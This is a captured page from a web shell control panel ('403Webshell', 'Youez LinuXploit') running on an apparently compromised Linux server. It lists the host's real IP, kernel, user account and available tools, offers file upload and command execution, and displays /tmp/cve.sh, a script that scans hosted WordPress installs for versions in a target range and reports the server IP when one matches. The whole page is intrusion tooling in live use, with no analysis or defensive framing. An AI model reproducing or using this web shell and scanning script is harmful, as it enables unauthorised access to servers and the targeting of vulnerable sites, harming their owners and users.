403Webshell
Server IP : 159.253.20.91  /  Your IP : 216.73.216.111
Web Server : nginx/1.20.2
System : Linux se38c9e53.fastvps-server.com 5.10.0-13-amd64 #1 SMP Debian 5.10.106-1 (2022-03-17) x86_64
User : pr11_ru_usr ( 1041)
PHP Version : 8.1.29
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : OFF  |  Sudo : ON  |  Pkexec : ON
Directory :  /tmp/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /tmp/cve.sh
#!/usr/bin/env bash

main_ip=$(ip route get 1.1.1.1 2>/dev/null | awk '{for (i=1;i<=NF;i++) if ($i=="src") {print $(i+1); exit}}')

find /var/www/*/data/www/*/wp-includes/version.php /var/www/admin/www/*/wp-includes/version.php \
  -type f 2>/dev/null |
while IFS= read -r file; do
  line=$(grep -m2 '\$wp_version' "$file") || continue
  ver=${line#*\'}
  ver=${ver%%\'*}

  case "$ver" in
      6.8|6.8.[0-5]|6.9|6.9.[0-4]|7.0|7.0.1)
      echo "$main_ip"
      exit 0
      ;;
  esac
done

exit 1

Youez - 2016 - github.com/yon3zu
LinuXploit